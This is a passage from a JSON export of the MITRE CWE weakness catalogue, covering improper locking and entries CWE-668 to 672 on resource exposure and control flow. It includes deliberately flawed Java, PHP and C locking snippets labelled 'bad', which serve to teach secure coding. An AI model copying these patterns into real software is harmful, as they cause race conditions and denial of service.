etc."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1340","@_Ordinal":"Primary"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Availability","Impact":"DoS: Resource Consumption (CPU)","Note":"Inconsistent locking discipline can lead to deadlock."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Strategy":"Libraries or Frameworks","Description":"Use industry standard APIs to implement locking mechanism."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In the following Java snippet, methods are defined to get and set a long field in an instance of a class that is shared across multiple threads. Because operations on double and long are nonatomic in Java, concurrent access may cause unexpected behavior. Thus, all operations on long and double fields should be synchronized.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private long someLongValue;public long getLongValue() {}public void setLongValue(long l) {}","xhtml:br":["","",""],"xhtml:div":[{"#text":"return someLongValue;","attr":{"@_style":"margin-left:10px;"}},{"#text":"someLongValue = l;","attr":{"@_style":"margin-left:10px;"}}]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-69"},"Intro_Text":"This code tries to obtain a lock for a file, then writes to it.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"function writeToLog($message){}fclose($logFile);","xhtml:div":{"#text":"$logfile = fopen(\\"logFile.log\\", \\"a\\");if (flock($logfile, LOCK_EX)) {}else {}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:i":"//attempt to get logfile lock","xhtml:div":[{"#text":"fwrite($logfile,$message);flock($logfile, LOCK_UN);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""],"xhtml:i":"// unlock logfile"},{"#text":"print \\"Could not obtain lock on logFile.log, message not recorded\\\\n\\";","attr":{"@_style":"margin-left:10px;"}}]},"xhtml:br":""}},"Body_Text":"PHP by default will wait indefinitely until a file lock is released. If an attacker is able to obtain the file lock, this code will pause execution, possibly leading to denial of service for other users. Note that in this case, if an attacker can perform an flock() on the file, they may already have privileges to destroy the log file. However, this still impacts the execution of other programs that depend on flock()."},{"attr":{"@_Demonstrative_Example_ID":"DX-24"},"Intro_Text":"The following function attempts to acquire a lock in order to perform operations on a shared resource.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"void f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"pthread_mutex_lock(mutex);pthread_mutex_unlock(mutex);","xhtml:br":["","","","",""],"xhtml:i":"/* access shared resource */"}}}},{"attr":{"@_Nature":"good","@_Language":"C"},"xhtml:div":{"#text":"int f(pthread_mutex_t *mutex) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int result;result = pthread_mutex_lock(mutex);if (0 != result)return pthread_mutex_unlock(mutex);","xhtml:br":["","","","","","","",""],"xhtml:div":{"#text":"return result;","attr":{"@_style":"margin-left:10px;"}},"xhtml:i":"/* access shared resource */"}}}}],"Body_Text":["However, the code does not check the value returned by pthread_mutex_lock() for errors. If pthread_mutex_lock() cannot acquire the mutex for any reason, the function may introduce a race condition into the program and result in undefined behavior.","In order to avoid data races, correctly written programs must check the result of thread synchronization functions and appropriately handle all errors, either by attempting to recover from them or reporting them to higher levels."]},{"attr":{"@_Demonstrative_Example_ID":"DX-70"},"Intro_Text":"It may seem that the following bit of code achieves thread safety while avoiding unnecessary synchronization...","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"if (helper == null) {}return helper;","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"synchronized (this) {}","xhtml:div":{"#text":"if (helper == null) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"helper = new Helper();","attr":{"@_style":"margin-left:10px;"}}}}},"xhtml:br":""}},{"attr":{"@_Nature":"bad"},"xhtml:div":"helper = new Helper();"}],"Body_Text":["The programmer wants to guarantee that only one Helper() object is ever allocated, but does not want to pay the cost of synchronization every time this code is called.","Suppose that helper is not initialized. Then, thread A sees that helper==null and enters the synchronized block and begins to execute:","If a second thread, thread B, takes over in the middle of this call and helper has not finished running the constructor, then thread B may make calls on helper while its fields hold incorrect values."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0935","Description":"Attacker provides invalid address to a memory-reading function, causing a mutex to be unlocked twice","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0935"},{"Reference":"CVE-2010-4210","Description":"function in OS kernel unlocks a mutex that was not previously locked, causing a panic or overwrite of arbitrary memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4210"},{"Reference":"CVE-2008-4302","Description":"Chain: OS kernel does not properly handle a failure of a function call (CWE-755), leading to an unlock of a resource that was not locked (CWE-832), with resultant crash.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4302"},{"Reference":"CVE-2009-1243","Description":"OS kernel performs an unlock in some incorrect circumstances, leading to panic.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1243"},{"Reference":"CVE-2009-2857","Description":"OS deadlock","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2857"},{"Reference":"CVE-2009-1961","Description":"OS deadlock involving 3 separate functions","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1961"},{"Reference":"CVE-2009-2699","Description":"deadlock in library","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2699"},{"Reference":"CVE-2009-4272","Description":"deadlock triggered by packets that force collisions in a routing table","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4272"},{"Reference":"CVE-2002-1850","Description":"read/write deadlock between web server and script","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1850"},{"Reference":"CVE-2004-0174","Description":"web server deadlock involving multiple listening connections","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0174"},{"Reference":"CVE-2009-1388","Description":"multiple simultaneous calls to the same function trigger deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1388"},{"Reference":"CVE-2006-5158","Description":"chain: other weakness leads to NULL pointer dereference (CWE-476) or deadlock (CWE-833).","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5158"},{"Reference":"CVE-2006-4342","Description":"deadlock when an operation is performed on a resource while it is being removed.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4342"},{"Reference":"CVE-2006-2374","Description":"Deadlock in device driver triggered by using file handle of a related device.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2374"},{"Reference":"CVE-2006-2275","Description":"Deadlock when large number of small messages cannot be processed quickly enough.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2275"},{"Reference":"CVE-2005-3847","Description":"OS kernel has deadlock triggered by a signal during a core dump.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3847"},{"Reference":"CVE-2005-3106","Description":"Race condition leads to deadlock.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3106"},{"Reference":"CVE-2005-2456","Description":"Chain: array index error (CWE-129) leads to deadlock (CWE-833)","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2456"},{"Reference":"CVE-2001-0682","Description":"Program can not execute when attacker obtains a mutex.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0682"},{"Reference":"CVE-2002-1914","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1914"},{"Reference":"CVE-2002-1915","Description":"Program can not execute when attacker obtains a lock on a critical output file.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1915"},{"Reference":"CVE-2002-0051","Description":"Critical file can be opened with exclusive read access by user, preventing application of security policy. Possibly related to improper permissions, large-window race condition.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0051"},{"Reference":"CVE-2000-0338","Description":"Chain: predictable file names used for locking, allowing attacker to create the lock beforehand. Resultant from permissions and randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0338"},{"Reference":"CVE-2000-1198","Description":"Chain: Lock files with predictable names. Resultant from randomness.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1198"},{"Reference":"CVE-2002-1869","Description":"Product does not check if it can write to a log file, allowing attackers to avoid logging by accessing the file using an exclusive lock. Overlaps unchecked error condition. This is not quite CWE-412, but close.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1869"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"CON31-C","Entry_Name":"Do not destroy a mutex while it is locked","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"POS48-C","Entry_Name":"Do not unlock or destroy another POSIX thread\'s mutex","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA00-J","Entry_Name":"Ensure visibility when accessing shared primitive variables"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA02-J","Entry_Name":"Ensure that compound operations on shared variables are atomic"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"VNA05-J","Entry_Name":"Ensure atomicity when reading and writing 64-bit values"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"LCK06-J","Entry_Name":"Do not use an instance lock to protect shared static data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP19","Entry_Name":"Missing Lock"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-667"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"25"}},{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"27"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-667"}}},"Notes":{"Note":{"#text":"Deeper research is necessary for synchronization and related mechanisms, including locks, mutexes, semaphores, and other mechanisms. Multiple entries are dependent on this research, which includes relationships to concurrency, race conditions, reentrant functions, etc.  CWE-662 and its children - including CWE-667, CWE-820, CWE-821, and others - may need to be modified significantly, along with their relationships.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples"}],"Previous_Entry_Name":{"#text":"Insufficient Locking","attr":{"@_Date":"2010-12-13"}}}},"668":{"attr":{"@_ID":"668","@_Name":"Exposure of Resource to Wrong Sphere","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product exposes a resource to the wrong control sphere, providing unintended actors with inappropriate access to the resource.","Extended_Description":{"xhtml:p":["Resources such as files and directories may be inadvertently exposed through mechanisms such as insecure permissions, or when a program accidentally operates on the wrong object. For example, a program may intend that private files can only be provided to a specific user. This effectively defines a control sphere that is intended to prevent attackers from accessing these private files. If the file permissions are insecure, then parties other than the user will be able to access those files.","A separate control sphere might effectively require that the user can only access the private files, but not any other files on the system. If the program does not ensure that the user is only requesting private files, then the user might be able to access other files on the system.","In either case, the end result is that a resource has been exposed to the wrong party."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Other"],"Impact":["Read Application Data","Modify Application Data","Other"]}},"Notes":{"Note":{"#text":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-22","Modification_Importance":"Critical","Modification_Comment":"Clarified description to include permissions."},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Other_Notes, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Relationships"}]}},"669":{"attr":{"@_ID":"669","@_Name":"Incorrect Resource Transfer Between Spheres","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product does not properly transfer a resource/behavior to another sphere, or improperly imports a resource/behavior from another sphere, in a manner that provides unintended control over that resource.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Background_Details":{"Background_Detail":"A \\"control sphere\\" is a set of resources and behaviors that are accessible to a single actor, or a group of actors. A product\'s security model will typically define multiple spheres, possibly implicitly. For example, a server might define one sphere for \\"administrators\\" who can create new user accounts with subdirectories under /home/server/, and a second sphere might cover the set of users who can create or delete files within their own subdirectories. A third sphere might be \\"users who are authenticated to the operating system on which the product is installed.\\" Each sphere has different sets of actors and allowable behaviors."},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Application Data","Modify Application Data","Unexpected State"]}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Background_Details, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}]}},"670":{"attr":{"@_ID":"670","@_Name":"Always-Incorrect Control Flow Implementation","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The code contains a control flow path that does not reflect the algorithm that the path is intended to implement, leading to incorrect behavior any time this path is navigated.","Extended_Description":"This weakness captures cases in which a particular code segment is always incorrect with respect to the algorithm that it is implementing. For example, if a C programmer intends to include multiple statements in a single block but does not include the enclosing braces (CWE-483), then the logic is always incorrect. This issue is in contrast to most weaknesses in which the code usually behaves correctly, except when it is externally manipulated in malicious ways.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"691","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"This issue typically appears in rarely-tested code, since the \\"always-incorrect\\" nature will be detected as a bug during normal usage."}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":["Other","Alter Execution Logic"]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2021-3011","Description":"virtual interrupt controller in a virtualization product allows crash of host by writing a certain invalid value to a register, which triggers a fatal error instead of returning an error code","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3011"}},"Notes":{"Note":{"#text":"This node could possibly be split into lower-level nodes. \\"Early Return\\" is for returning control to the caller too soon (e.g., CWE-584). \\"Excess Return\\" is when control is returned too far up the call stack (CWE-600, CWE-395). \\"Improper control limitation\\" occurs when the product maintains control at a lower level of execution, when control should be returned \\"further\\" up the call stack (CWE-455). \\"Incorrect syntax\\" covers code that\'s \\"just plain wrong\\" such as CWE-484 and CWE-483.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Maintenance_Notes, Modes_of_Introduction, Other_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"671":{"attr":{"@_ID":"671","@_Name":"Lack of Administrator Control over Security","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product uses security features in a way that prevents the product\'s administrator from tailoring security settings to reflect the environment in which the product is being used. This introduces resultant weaknesses or prevents it from operating at a level of security that is desired by the administrator.","Extended_Description":"If the product\'s administrator does not have the ability to manage security-related decisions at all times, then protecting the product from outside threats - including the product\'s developer - can become impossible. For example, a hard-coded account name and password cannot be changed by the administrator, thus exposing that product to attacks that the administrator can not prevent.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"657","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Varies by Context"}},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Relevant_Properties"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Design Principle Violation: Lack of Administrator Control over Security","attr":{"@_Date":"2009-01-12"}}}},"672":{"attr":{"@_ID":"672","@_Name":"Operation on a Resource after Expiration or Release","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses, accesses, or otherwise operates on a resource after that resource has been expired, released, or revoked.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"666","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":[{"Scope":["Integrity","Confidentiality"],"Impact":["Modify Application Data","Read Application Data"],"Note":"If a released resource is subsequently reused or reallocated, then an attempt to use the original resource might allow access to sensitive data 